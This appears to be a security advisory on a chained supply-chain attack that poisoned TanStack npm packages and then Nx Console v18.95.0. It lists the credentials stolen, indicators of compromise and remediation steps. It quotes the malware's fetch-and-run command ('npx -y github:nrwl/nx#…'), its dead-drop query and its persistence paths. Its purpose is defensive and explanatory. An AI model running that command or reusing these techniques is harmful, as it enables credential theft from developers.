From TanStack to Nx Console: Chained Supply-Chain Attack CVE-2026-45321 / CVE-2026-48027

Two supply-chain attacks observed in quick succession on May 11 and May 18, 2026 have turned out to be a single chained incident. On May 27, 2026, CISA added both CVEs — CVE-2026-45321 (TanStack) and CVE-2026-48027 (Nx Console) — to the Known Exploited Vulnerabilities (KEV) catalog on the same day.

May 11 was when the npm packages of TanStack, the React routing library family, were poisoned. Forty-two packages including @tanstack/react-router, accounting for 84 versions in total, were shipped from the legitimate npm registry with attacker-injected code. A package that pulls 12.7M weekly downloads went global in a publication window of just six minutes.

Then on May 18, the credentials leaked in that first stage powered the next strike. Version 18.95.0 of Nx Console, the VS Code extension shipped by Nx, was distributed as a malicious build for 11 minutes on the Visual Studio Marketplace and 36 minutes on Open VSX. The package was engineered to siphon a user's GitHub credentials, AWS credentials, SSH private keys, 1Password Vault contents, Kubernetes tokens, and even Claude Code settings stored under ~/.claude/.

Snyk dubbed the campaign "Mini Shai-Hulud," and StepSecurity attributed it to the actor group "TeamPCP." Joint analyses from Socket and StepSecurity, together with the postmortems from both TanStack and Nx, have brought into focus what is shaping up to be one of the largest JavaScript/TypeScript supply-chain attacks of 2026.

What Happened: A Seven-Day Chain From May 11 to May 18

Laid out in chronological order, the attack breaks into two stages. The credentials obtained in stage one (TanStack) were used in stage two (Nx Console) to poison an entirely different target — a deliberately planned multi-stage operation.

The exposure windows were as short as six minutes and 11–36 minutes respectively, but the versions downloaded in that interval continue to live on in CI/CD pipelines around the world. Follow-up reporting from Cryptika and Strobes indicates the damage spread further, reaching maintainer accounts at Mistral AI and UiPath as well.

What TanStack And Nx Console Are

TanStack is an OSS collective led by U.S.-based developer Tanner Linsley, shipping the React data-fetching library TanStack Query (formerly React Query), the routing library TanStack Router, and the table-rendering library TanStack Table. Because its libraries are framework-agnostic and ship Vue, Solid, and Svelte versions alongside React, virtually every JavaScript-ecosystem web developer uses them, directly or transitively. The 12.7 million weekly downloads of @tanstack/react-router alone speak to that reach.

Nx Console, on the other hand, is the VS Code GUI extension for the Nx monorepo toolchain developed by Nrwl (now Nx). Nx itself helps engineering teams consolidate large JavaScript/TypeScript projects into a single "monorepo" and is embedded inside the in-house developer platforms of major companies including Google, Microsoft, Roche, and Capital One. Nx Console surfaces that tooling inside VS Code and, per StepSecurity's analysis, has reached 2.2 million cumulative installs.

Both projects sit at the core of the JavaScript/TypeScript developer toolchain — from individual web-app developers, to enterprise CI/CD pipelines, to large Nx Cloud customers. That is precisely why this campaign is being described as a "carefully aimed supply-chain attack."

CVE-2026-45321: TanStack npm Poisoning Across 42 Packages

Stage one combined three distinct GitHub Actions misconfigurations into a remarkably polished attack. NVD classifies it as CWE-506 (Embedded Malicious Code) with CVSS 9.6.

The crux of the attack was a misconfigured GitHub Actions pull_request_target trigger — the classic "Pwn Request" weakness, where a PR coming from a fork is allowed to run CI with the privileges of the upstream repository. The attacker tampered with the build cache via a fork PR, poisoned the cache the moment TanStack's release pipeline kicked in, and then siphoned the legitimate npm OIDC token straight out of the runner's memory, publishing malicious versions under TanStack's own identity.

What deserves particular attention is that this is the first known case of malicious npm packages being delivered with valid SLSA provenance. SLSA is a mechanism for cryptographically attesting the build origin of a package, and npm has supported it natively since v9. Because the attacker hijacked a legitimate CI environment, the SLSA attestation issued from it was "genuine" — signature verification cannot tell the malicious package apart. The provenance layer, treated by many as "the last line of defense in supply-chain assurance," has been breached.

router_init.js bundled together a "credential-harvesting engine" that pulled secrets from AWS IMDS (instance metadata service), Secrets Manager, SSM Parameter Store, HashiCorp Vault, and Kubernetes service-account tokens, alongside a "worm propagation module" that re-spread itself through downstream victim CI. According to Rescana, the damage spread to dozens of OSS maintainer accounts, including those associated with Mistral AI and UiPath.

CVE-2026-48027: Leaked Credentials Pivot Into Nx Console

Stage two used the "Nx contributor's GitHub CLI OAuth token" leaked in stage one as its starting point. NVD again classifies this as CWE-506, with CVSS 9.3 (v4.0).

There are three technical highlights. First, the attacker created an orphan commit — a commit unreachable from any branch — inside the nrwl/nx repository. The SHA is 558b09d7ad0d1660e2a0fb8a06da81a6f42e06d2. A 497KB obfuscated dropper was stashed inside as a hidden cache, invisible from any branch view. It cannot be found by a naive walk of commit history; only those who know the SHA can pull it.

Second, the malicious VSIX itself was a mere 2,777 bytes of added code. Those bytes were injected into main.js and, on startup, executed npx -y github:nrwl/nx#558b09d7 to fetch the contents of the orphan commit above. Keeping the VSIX body lightweight is how the attacker slipped past Microsoft's automated scanning.

Third, the payload included a Sigstore forgery module. Combined with the stolen npm OIDC tokens, the attacker could fetch a legitimate signing certificate from Sigstore and then, from a victim's CI environment, re-distribute further "valid SLSA provenance" malicious npm packages downstream. In other words, the same "provenance forgery" toolkit used in the TanStack attack was being set up for even broader distribution through Nx.

What Gets Stolen: The Full Credential Catalog

Immediately after Nx Console v18.95.0 launches, it begins harvesting every kind of credential it can find on the developer's machine. According to StepSecurity's analysis, the attack is organized into six collection modules.

Worth singling out: Claude Code settings (~/.claude/) are explicitly in scope. As AI coding assistants proliferate, developers increasingly accumulate AI-related credentials and conversation history under their home directory, and attackers have already added that to their target list. It is an early sign of how supply-chain attacks are evolving in 2026 and beyond.

The stolen data is exfiltrated over three channels to attacker infrastructure: HTTPS POST (to a hard-coded C2 domain over port 443), commits made through the GitHub API to an attacker-controlled repository, and DNS tunneling as a fallback. The data is wrapped in hybrid AES-256-GCM + RSA-OAEP encryption, so network monitoring cannot inspect the contents in flight.

The persistence mechanism is equally crafted. On macOS, the malware drops a Python backdoor at ~/.local/share/kitty/cat.py and registers a LaunchAgent so it survives reboots. The backdoor then polls the GitHub Search API hourly with api.github.com/search/commits?q=firedalazer, pulling attacker-signed commits as "dead-drop" messages, verifying them against a 4096-bit RSA public key, and only then executing the embedded command. Only the attacker can sign — so third parties cannot inject fake commands into the channel.

What To Do Now

1. If you may have used Nx Console v18.95.0, check for IoCs immediately. If you remember installing or updating to that version between 12:30 and 13:09 UTC on May 18, look for the following files and processes.

• macOS: ~/.local/share/kitty/cat.py / ~/Library/LaunchAgents/com.user.kitty-monitor.plist
• Linux/macOS: /var/tmp/.gh_update_state
• Linux: unexpected passwordless entries in /etc/sudoers
• Processes carrying the environment variable __DAEMONIZED=1
• Python processes whose names contain kitty-

2. If anything matches, rotate every credential stored on the machine. "Just delete the files" is not enough. GitHub PATs, SSH keys, AWS access keys, GCP keys, npm tokens, Vault tokens, Kubernetes service-account tokens, 1Password Vault passwords, AI assistant configurations such as Claude Code or Cursor — literally every credential needs to be reissued. For highly sensitive environments, fully re-imaging the machine is the recommended response.

3. Audit CI logs for TanStack-dependent projects all the way back to May 11. If your repositories use @tanstack/*, builds that ran on or after 19:20–19:26 UTC on May 11 may have pulled in a poisoned version. Check the resolved versions in package-lock.json, and if any tainted releases were picked up, assume the CI worker's credentials are also compromised and audit accordingly.

4. Upgrade pnpm to 10.16 or later. The proximate trigger of the Nx contributor's compromise was a bug in pnpm 10.14 that silently ignored the minimum-release-age=10080 setting (which is meant to refuse to install packages newer than seven days). The setting works correctly from pnpm 10.16 onward. "Do not adopt brand-new versions instantly" is a powerful way to blunt the immediate blast radius of a supply-chain attack.

5. Audit GitHub Actions pull_request_target triggers across the entire organization. The root cause of the TanStack breach was the classic "Pwn Request" weakness. Any repository that uses pull_request_target on PRs from forks while also holding write-scope permissions (npm publish, tag push, Action cache writes) needs to revisit its configuration immediately. Action dependencies (the uses: org/action@v1 form) should also be switched from floating references to SHA-pinned references.

6. Consider isolating AI assistant configurations. The fact that AI coding assistant settings — Claude Code included — have become attack targets is significant, and they tend to live in highly predictable locations like ~/.claude/. Corporate API keys should not sit in plaintext on individual developer machines; consider provisioning them through an in-house secrets manager or SSO-issued credentials instead.

Why It's Called "Mini Shai-Hulud": Connection to the 2025 Worm

Snyk named this campaign "Mini Shai-Hulud." "Shai-Hulud" was the codename of the large-scale worming supply-chain attack that hit the npm ecosystem in September 2025, during which hundreds of npm packages were chain-infected. This campaign is positioned as a "smaller" but "more sophisticated" successor.

The difference from the 2025 version is that TeamPCP has evolved the playbook into a "provenance-backed" attack carried out through a legitimate CI environment. Where the 2025 version was "hijack a maintainer account and publish," the 2026 version is "hijack a legitimate pipeline and publish with signatures and provenance attached." Even as the industry baseline for supply-chain assurance rises, attacks that ride one step above that baseline keep maturing in parallel.

For continuous observation of chained supply-chain attacks like this one, this site operates an OSS Supply-Chain Scanner. It lets you check the current poisoning status of any @tanstack/* packages you use, along with related dependencies (packages contaminated via the Mistral AI / UiPath paths). A list of CVEs currently under active exploitation, including their CISA KEV listing history, can be tracked from the CISA KEV Dashboard (Japanese edition).

Nx's postmortem lists four follow-up measures: requiring publication approvals via GitHub Actions environments, monitoring GitHub audit logs, enforcing SHA-pinned GitHub Actions org-wide, and requiring two-person approval on the publisher side. Unless OSS maintainers across the ecosystem adopt equivalent controls, the structural fragility that allowed a TanStack → Nx chain leaves the door open for a third or fourth hop at any time.

References

• ▸ NVD - CVE-2026-45321 Detail (TanStack)
• ▸ NVD - CVE-2026-48027 Detail (Nx Console)
• ▸ TanStack Blog - Postmortem: TanStack npm supply-chain compromise (official postmortem)
• ▸ Nx Blog - Nx Console v18.95.0 Postmortem (official postmortem)
• ▸ StepSecurity - Nx Console VS Code Extension Compromised
• ▸ Snyk - TanStack npm Packages Hit by Mini Shai-Hulud
• ▸ Socket - TanStack npm Packages Compromised in Ongoing Mini Shai-Hulud Supply Chain Attack
• ▸ Strobes - TanStack npm Supply Chain Attack: 170 Packages Compromised
• ▸ Cryptika - 84 TanStack npm Packages Hacked in Ongoing Supply-Chain Attack
• ▸ Rescana - TanStack npm Supply Chain Attack: Detailed Analysis
• ▸ GitHub - TanStack/router Issue #7383: Several npm latest releases were compromised
• ▸ CISA - Known Exploited Vulnerabilities Catalog